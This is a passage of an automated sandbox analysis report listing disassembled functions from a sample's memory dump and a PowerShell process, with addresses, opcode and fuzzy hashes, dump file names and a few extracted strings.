                                                                • Opcode Fuzzy Hash: 364e2c2454f659e17b929bd6d5a310316bd8dc7b61ece90421b3e3f6c55aecc1
                                                                • Instruction Fuzzy Hash: 3631529660E2C0A9E756867C400527DFFD4FB23B04F1CD9ADE28487293C92DD4DAE721
                                                                Function 00007FF68EF38B60 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efe3887042deae7314b967deea58ea6fa4c26b6d27909147578876e986a8bede
                                                                • Instruction ID: e60a962f880999599ee41e4cf8992c448330edf1792655bdd9d81e6b7286c16d
                                                                • Opcode Fuzzy Hash: efe3887042deae7314b967deea58ea6fa4c26b6d27909147578876e986a8bede
                                                                • Instruction Fuzzy Hash: B211EF37711E0143E74CC629D9323BD2193A3C4209E98E67EDA4BCE7D9EF394426C245
                                                                Function 00007FF68EF33320 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9665a3c8e7e8df648f74643c9e3837ed74489bc1e24a67a37c66135fe5326625
                                                                • Instruction ID: e66bb1a593c1f8f7e0dac46506f50fae8a8719e1ff0431b4bec5f717a3a499f0
                                                                • Opcode Fuzzy Hash: 9665a3c8e7e8df648f74643c9e3837ed74489bc1e24a67a37c66135fe5326625
                                                                • Instruction Fuzzy Hash: 3B21F9B33315A542E7428F05E544699B699F354B4DB54A024FE0B5BB84C33EF452D700
                                                                Function 00007FF68EF37C00 Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 273eaa5b208ae59fa92b979da69812e1cf336c2c554ce1a17477a53ded124dac
                                                                • Instruction ID: 9f839e1a7103c81bd0272c920a16e52cab38d3042485ba8f536fff862b636a8e
                                                                • Opcode Fuzzy Hash: 273eaa5b208ae59fa92b979da69812e1cf336c2c554ce1a17477a53ded124dac
                                                                • Instruction Fuzzy Hash: 3B01A13B370D0B476B4C8578DD337BD2191A3452157C8A63EEA5BCA2C2EA2DC465C245
                                                                Function 00007FF68EF32514 Relevance: .0, Instructions: 2COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 695b26d0a898fa640735135adb199014f920f8e20f8fc4c07d66bca64c235301
                                                                • Instruction ID: 6d56c2d9c0cd8e2f0193a03b66e4ab28cc36181667e721b375ff42e1b51583f1
                                                                • Opcode Fuzzy Hash: 695b26d0a898fa640735135adb199014f920f8e20f8fc4c07d66bca64c235301
                                                                • Instruction Fuzzy Hash: 5CA00161908D02D4E74A8B91ADA01202260BFA4301F410139E00D821A0EF3CA648C302
                                                                Function 00007FF68EF314B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • printf.MSPDB140-MSVCRT ref: 00007FF68EF314CD
                                                                  • Part of subcall function 00007FF68EF313F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68EF31418
                                                                  • Part of subcall function 00007FF68EF313F0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68EF31437
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: __acrt_iob_func__stdio_common_vfprintfprintf
                                                                • String ID: [!] Please Input A Valid x64 Pe File !$[!] We Do Not Support Dll Files !$[!] We Do Not Support x32 Exe Files, Yet !
                                                                • API String ID: 115429112-3694449406
                                                                • Opcode ID: 9c66d0a18c6db04ca9e1ad55c47463c0ad7d98b22bcee0dad5a017a2a428367f
                                                                • Instruction ID: 1b8f9ee729517ccfdad8d61d1e06c756a0c9dc117670aa14013f43381d86cb76
                                                                • Opcode Fuzzy Hash: 9c66d0a18c6db04ca9e1ad55c47463c0ad7d98b22bcee0dad5a017a2a428367f
                                                                • Instruction Fuzzy Hash: 49F0FF15F04502C2EF98A78AD8522B52151FFB4740FC0403AF64EC32E2EE3CD996C712

                                                                Executed Functions

                                                                Function 00007FF88797B956 Relevance: .5, Instructions: 470COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d5c3fc4643e4aad7db47d9540f1d8cb97af05374932382467859a51232498d0b
                                                                • Instruction ID: 9796f0eec4cd684edc35e984277a14f37168f38a9b056d15fd153c0002acf348
                                                                • Opcode Fuzzy Hash: d5c3fc4643e4aad7db47d9540f1d8cb97af05374932382467859a51232498d0b
                                                                • Instruction Fuzzy Hash: 7AF19230908A8E8FEBA9DF28C8597F937E1FF54354F04426AD84DC7295DB389945CB82
                                                                Function 00007FF88797C702 Relevance: .5, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b925b2d481c362a70590ff3afed2a83c1ead06113c1f07d26f66725ad5efcef8
                                                                • Instruction ID: 4a14e77b3210fbe4819f467940a42d67fd37de20502a4e2997265634f58db154
                                                                • Opcode Fuzzy Hash: b925b2d481c362a70590ff3afed2a83c1ead06113c1f07d26f66725ad5efcef8
                                                                • Instruction Fuzzy Hash: 57E1C530908A8E8FEBA8DF28C8557E937E1FF55390F14426ED84DC7291DE78A941C782
                                                                Function 00007FF88797F0E0 Relevance: 2.8, Strings: 2, Instructions: 345COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6Z$0Wd
                                                                • API String ID: 0-1025847120
                                                                • Opcode ID: 5abae855327eeb7c1a5403bff78e254104ca9eaf4bd07068f70bb7cdbdb54766
                                                                • Instruction ID: 0752a1f32ee2bfe158f236eaf28bde8305eb8c1e997de42d66fbf08bb8552932
                                                                • Opcode Fuzzy Hash: 5abae855327eeb7c1a5403bff78e254104ca9eaf4bd07068f70bb7cdbdb54766
                                                                • Instruction Fuzzy Hash: BDA1F771A1CA8E8FE758DE2898596BC77E2FF99784F140179E44DD3282CE28A803C741
                                                                Function 00007FF887A409ED Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 1A_L
                                                                • API String ID: 0-1522723599
                                                                • Opcode ID: ca5c00fcb36216da3e76b29f0e01db38ca4f14c845825c62ec06f958e14a2320
                                                                • Instruction ID: ed43e36722555659f6e481c724fa81ccaf4aff4f9020eaf20eeaee049221f258
                                                                • Opcode Fuzzy Hash: ca5c00fcb36216da3e76b29f0e01db38ca4f14c845825c62ec06f958e14a2320
                                                                • Instruction Fuzzy Hash: 37B11621A4DA468FEB99EA28849697A7BF1FFA5340B1901FEC04DCB1D3DD15EC06C781
                                                                Function 00007FF887A40A2B Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 1A_L
                                                                • API String ID: 0-1522723599
                                                                • Opcode ID: 792d936eef044fe9d650ddeab4cf31cc6c35fcf010404fbd90bf1bdc834344d5
                                                                • Instruction ID: 5db8b09cb490e27f8337d12274e3bdf19523ea68a190f64f8f9816547c72b450
                                                                • Opcode Fuzzy Hash: 792d936eef044fe9d650ddeab4cf31cc6c35fcf010404fbd90bf1bdc834344d5
                                                                • Instruction Fuzzy Hash: 4071E331B4CA4A8FDB99EA28C49693A77E1FFA5344B1501BED40DC7292DD25EC42C7C1
                                                                Function 00007FF887A433FB Relevance: .4, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a79fc2d231941b4d90aeff5218bbd8c8cde1f968cf6fe1001378664db3434939
                                                                • Instruction ID: 57e7df1a519b4a251bcde01f2583d20ae52fbc5dcb1f8ed4fb1e8ee0407bea29
                                                                • Opcode Fuzzy Hash: a79fc2d231941b4d90aeff5218bbd8c8cde1f968cf6fe1001378664db3434939
                                                                • Instruction Fuzzy Hash: 97D15675E8DA8A5FE795EB6848166BEBBB0FF15390F1400BED04DC71C3DA19A801C792
                                                                Function 00007FF88797C316 Relevance: .3, Instructions: 329COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c33313b135b139ad51cfb52fc986e0fb9855c27712dc08e7c0c6c4cf982a1079
                                                                • Instruction ID: 193315f45bca027924ff8f60c89e55c6b89c406efaf26e6d71603995f85d9dac
                                                                • Opcode Fuzzy Hash: c33313b135b139ad51cfb52fc986e0fb9855c27712dc08e7c0c6c4cf982a1079
                                                                • Instruction Fuzzy Hash: E3B1943050CA8E4FEB69DF28D8567F93BE1FF55350F14426AE84DC7292CA389945CB82
                                                                Function 00007FF88797BE14 Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 581876ba0bd15f5554dcac3fcbbb8f4aaaefda39392b458ee2e961edd4cf4058
                                                                • Instruction ID: b7eed5455d4504ecf8e4cb314302d425b36d937409cec1865e094eef289d2718
                                                                • Opcode Fuzzy Hash: 581876ba0bd15f5554dcac3fcbbb8f4aaaefda39392b458ee2e961edd4cf4058
                                                                • Instruction Fuzzy Hash: F6312D3085868F8EFBB4AF18CC5ABF932A4FF41399F404539D50EC6192CA3C6986CB51
                                                                Function 00007FF887977719 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5bf3e1966c2114e1e788fbfcaee04724aec3f0e7d803078e82e4390cfe26757
                                                                • Instruction ID: 720e471387152544c51e7c60a773010f019c5b3e9c4d8fa78bd69cbfa3ebaee4
                                                                • Opcode Fuzzy Hash: a5bf3e1966c2114e1e788fbfcaee04724aec3f0e7d803078e82e4390cfe26757
                                                                • Instruction Fuzzy Hash: B201F772B5C64A8FEB489E1CE8925B473F1E764360B6400BED44AC7297D816F8438645
                                                                Function 00007FF8879733B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0514036d3b8c5aa8485ba4ce54d046e3511d262dd6e4f7bcf181fc14ee9a49f
                                                                • Instruction ID: 8bacec51ff116b20530402f2c3e1cee201568d5bc4c54f7cccf4afb66d89fb46
                                                                • Opcode Fuzzy Hash: c0514036d3b8c5aa8485ba4ce54d046e3511d262dd6e4f7bcf181fc14ee9a49f
                                                                • Instruction Fuzzy Hash: 5801A73015CB0D4FD744EF0CE455AA9B3E0FB85360F10052DE58EC3691DA36E882CB42
                                                                Function 00007FF887977788 Relevance: .0, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6233176425a6432a8c97e3c38b315913e9387fbc0a8b5f3a9f069df9b873f9ba
                                                                • Instruction ID: fed858e2e99e2b63cb21656bb6a91e8e03b44d380fff6423ca2eeb4525109974
                                                                • Opcode Fuzzy Hash: 6233176425a6432a8c97e3c38b315913e9387fbc0a8b5f3a9f069df9b873f9ba
                                                                • Instruction Fuzzy Hash: 57F0373175C6058FDB4CAA1CF8419B573D1E795320B10016EE48BC2696E917E842C686
                                                                Function 00007FF887984209 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90d26d225355a24acfd4be32ca4a132afd35066236851ba8c850e9b605efe36c
                                                                • Instruction ID: 13161c7bdf1e2d3e902a0870704ecd9a1826b09185dbf9d56c4b759bfb4116a9
                                                                • Opcode Fuzzy Hash: 90d26d225355a24acfd4be32ca4a132afd35066236851ba8c850e9b605efe36c
                                                                • Instruction Fuzzy Hash: 2EF05E51A6D99B5FE394A65C68197A82692EB88380F2A40B5D00CCB2D6DA2CAC098291
                                                                Function 00007FF8879816C8 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b242f73f437f926249c865ad546cb06a3429bfa51d42194940c2cf967481700
                                                                • Instruction ID: c74401d7ca679234d6a83502c7b24b1975c5830faa03bc87249992da58c49817
                                                                • Opcode Fuzzy Hash: 1b242f73f437f926249c865ad546cb06a3429bfa51d42194940c2cf967481700
                                                                • Instruction Fuzzy Hash: 40E0D811A8CD5A0BA695A12C585917977D1E794270B1C0B7BC44DC6261EC5948820281

                                                                Non-executed Functions

                                                                Function 00007FF8879706A0 Relevance: 8.9, Strings: 7, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (0w$8,w$H1w$P/w$p0w$-w$/w
                                                                • API String ID: 0-3134464491
                                                                • Opcode ID: c6988d6c6a1b5bb606ae10afec684b82ea323f2aa1462f3f72b8501efee019f4
                                                                • Instruction ID: 1f30d0a2095553c92f9f9165e598a1eac1659067654de32addd95fc9ce9ff4fd
                                                                • Opcode Fuzzy Hash: c6988d6c6a1b5bb606ae10afec684b82ea323f2aa1462f3f72b8501efee019f4
                                                                • Instruction Fuzzy Hash: 3131AE52D4E9D24EE6264A6C3C1D1B95BB0FF657D0B1841FBC0AC4B1CBD84C9C2A8386
                                                                Function 00007FF8879806FA Relevance: 7.8, Strings: 6, Instructions: 316COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ":$#:$=M_^$M_^$M_^ $M_^$
                                                                • API String ID: 0-437579093
                                                                • Opcode ID: 8d01c0b497d8c604781ee6acb47d1277cf811742ff0302503575712c79cefd32
                                                                • Instruction ID: 636f093e081cf00a329f16dcfc842cd36d1ff99a8f9d8461fab789d2ef8e3807
                                                                • Opcode Fuzzy Hash: 8d01c0b497d8c604781ee6acb47d1277cf811742ff0302503575712c79cefd32
                                                                • Instruction Fuzzy Hash: 1A81E597AA9267C4E6113AFD7845AFD6B54DF813F5B2847B3D29C890C3CC1C60838AD6